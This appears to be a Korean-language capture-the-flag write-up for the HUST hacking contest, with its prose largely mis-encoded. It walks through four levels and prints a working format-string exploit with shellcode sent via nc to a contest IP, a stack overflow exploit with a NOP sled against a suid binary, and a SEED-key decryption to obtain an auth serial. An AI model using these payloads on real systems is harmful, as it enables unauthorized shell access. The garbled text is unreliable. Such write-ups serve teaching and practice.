ȳϼ? beist Դϴ.  3 ȸ HUST ŷ ȸ Դϴ.




- Level1 

level1.exe  ϸ ÷  ̻ ̷ ȭ   ˴ϴ.
׸ ÷ε port scanner    ǰ,  text  ϴ. 
Ƹ     ؼ   ϴ.

level1.exe  port scanner  Ǵ  , port scan   Ǿִ
 ˾Ҵµ ȸ Ȩ Ư  Ʈ   ҽϴ.

׸,  PC  bind ϴ port     level1.exe binary  
мϴ   ǵϰŶ ǴϿϴ.

hex editor  ( ultra editor  Ͽϴ.) exe   ͸
  ֽϴ.    pass  õ string  ˻ϱ ߴµ,
pass  õ Ͱ 3  ̴.

passwd=10125
passwd=65536
passwd=ejgkrl

ejgkrl  'ϱ'  ŸԴϴ.    ΰ ϶ ̾߱ . 
ΰ ϸ 75661 ε    õϸ   ˴ϴ.





- level2 

remote  Ʈ Դϴ. 2  Ʈ ĵغϱ 980 Ʈ 
ϴ.  ؼ     dump ȭ ݴϴ. %x  
 Ʈ Էϴϱ ּ  ϴ    ־ format string 
  ߽ϴ.

level2  ⺻ formatstring      ϸ ˴ϴ.

[ּ1] - [Dummy] - [ּ2] - [%8x%8x] - [integer] - [%n format] -
[integer] - [%n format] - [shellcode]                        

ּ1, 2  return address   ġԴϴ.  ڵ  
shellcode  ÷Ͽµ, shellcode   ġ dump ȭ 鼭  
ֽϴ. dump ȭ鿡  shellcode  ġ Ͽ return address  
 level2  shell    ֽϴ.

 ڵ Ʒ ϴ. ϴ ýۿ   ٸ ֽϴ.

(perl -e 'print "\xec\xfd\xff\xbfAAAA\xee\xfd\xff\xbf", "%8x"x2, 
"%64936d%n%49723d%n\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"';cat)|
nc 203.249.94.33 980 





- level3 

level3  Ϲ overflow Դϴ.  ̳ʸθ Ǵµ  ҽ 
  ϴ.


#include <stdio.h>

int main(int argc, char *argv[])
{
        char buf[8];

        strcpy(buf, argv[1]);
        printf(buf);
}


 level2  ٰ մϴ. level3  level3pw  suid  
پֱ  overflow  Ѵٸ ڴ level3pw    ֽϴ.

ȯ  Shellcode  ÷ argv[1]  ٽ  ȯ  Ű 
 ϰڽϴ.

ϴ ڵ :

\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80

[beist@
[beist@beist hust]$ export BEIST=`perl -e 'print "\x90"x1000, "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
[beist@beist hust]$ ./level3 `perl -e 'print "\xfa\xf9\xff\xbf"x4'`
sh-2.05b$

⼭ ڵ տ set*uid(level3pw)    ϴ ڵ带 ߰Ѿ մϴ.
ŷ ȸ  ڷᰡ  level3pw  uid  Ȯ Ͽ ⿡ 
߽ϴ.





- level4 

level4  udp  Դϴ.  4  1337 port  udp Ʈ ֽϴ.
 α׷  ̸ udpserv Դϴ. client  udpserv  ͸ ϰ,
ٽ   31337 port  ޾ƾ մϴ. , client  udpserv   
 port bind  31337  ְ  ؾѴٴ ̾߱Դϴ.

level4 udpserv port - 1337
client port - 31337

̷ ·  ؾմϴ. client  port  31337  ߴ   ʽϴ.
nc  ̿ϸ  մϴ. nc  -p ɼ local port  Ƿ ؼ 
ִ  ֽϴ.

level4  Ʈ ־ Ŀǵ带  GET  AUTH  ֽϴ. GET Ŀǵ带 
 ̿Ͽ ϸ,

printf "GET"|nc -u level4 -p 31337

level4  ȣȭ ȣ  ˴ϴ.   client   ʹ nc  -o 
ɼ ־ dump  ϰų ϸ   ֽϴ. Ǵ network sniffing  
  ֽϴ. 

ex) tcpdump  ̿ packet capture

02:13:58.961288 211-255-9-215.rev.krline.net.31337 > 203.249.94.26.1337: udp 3 (DF)
0x0000   4500 001f 868a 4000 4011 ac59 d3ff 09d7        E.....@.@..Y....
0x0010   cbf9 5e1a 7a69 0539 000b dd05 4745 54          ..^.zi.9....GET
02:13:58.972455 203.249.94.26.32772 > 211-255-9-215.rev.krline.net.31337: udp 32 (DF)
0x0000   4500 003c 0000 4000 2f11 43c7 cbf9 5e1a        E..<..@./.C...^.
0x0010   d3ff 09d7 8004 7a69 0028 36d7 c236 6117        ......zi.(6..6a.
0x0020   6fdb be36 629c fc01 547a 9e2b 997c c731        o..6b...Tz.+.|.1
0x0030   61f5 6f38 abde 05a7 285d 180b 

ŵ udp  data κ 32 ƮԴϴ. ü ŵ ũⰡ 60 Ʈ  
 28 Ʈ udp  header  Դϴ.  c236....180b  ȣȭ ȣ
Դϴ.

 ȣȭ ȣ SEED  ̿Ͽ ȣȭǾϴ. SEED ȣ key  ʿѵ
level4  Ʈ  key , ȣȭ SEED  ڿ ˷ְ ֽϴ. 
ڴ  key  ̿Ͽ ٽ ȣȭŰ ˴ϴ.

ȣȭ SEED  OFBPAD Դϴ.

Ʈ ־ key Դϴ.

12 34 56 78 9A BC DE F0 01 23 45 67 89 AB CD EF
10 DC 98 BA 76 54 32 FE 10 DC 98 BA 76 54 32 FE

 key  ̿Ͽ ȣȭ   ֽϴ. ȣȭ  ʽϴ. ȣȭ/ȣȭ
׽Ʈ   ִ SEED   ޾Ƽ ϸ    ֽϴ.

(http://beist.org/seed.zip  α׷ ÷ҽϴ. ̷ üũϽð ϼ.
  readme.txt  ϼ.)

key.dat Ͽ key  ð OFBPAD  ȣȭ ȣ ȣȭϽø ˴ϴ.
⼭ ȣȭ ȣ 

c236 6117 6fdb be36 629c fc01 547a 9e2b 
997c c731 61f5 6f38 abde 05a7 285d 180b 

Դϴ.   ȣȭϿ ȣ Ǯ 

9bab258d3dfe4422b3e092aae75b6dac

   ˴ϴ.  

AUTH/SERIAL/9bab258d3dfe4422b3e092aae75b6dac 

(AUTH SERIAL 9bab258d3dfe4422b3e092aae75b6dac ϼ ֽϴ.  س..)

   udp 1337   ٽ  Ͱ  ˴ϴ.   
OFBPAD  ȣȭ level4  ȣԴϴ.

   ȣȭ ϸ level4  н带   ְ,  н带 ̿Ͽ
level4 α ϸ index  ٲ  ֽϴ. (  κп ؼ 
 ߱  ڷḦ ÷     մϴ.)



׷ ̸  ġڽϴ.




 
 

